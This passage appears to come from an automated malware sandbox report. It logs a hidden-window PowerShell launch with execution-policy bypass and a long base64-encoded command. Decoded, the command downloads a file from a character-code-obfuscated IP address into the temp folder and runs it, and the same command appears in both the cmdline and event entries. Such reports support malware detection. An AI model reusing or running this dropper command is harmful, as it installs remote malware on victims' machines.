QAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
cmdline	C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 20, 2023, 12:16 p.m.	show_type: 0 filepath_r: C:\Windows\SYSTeM32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe parameters: "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAA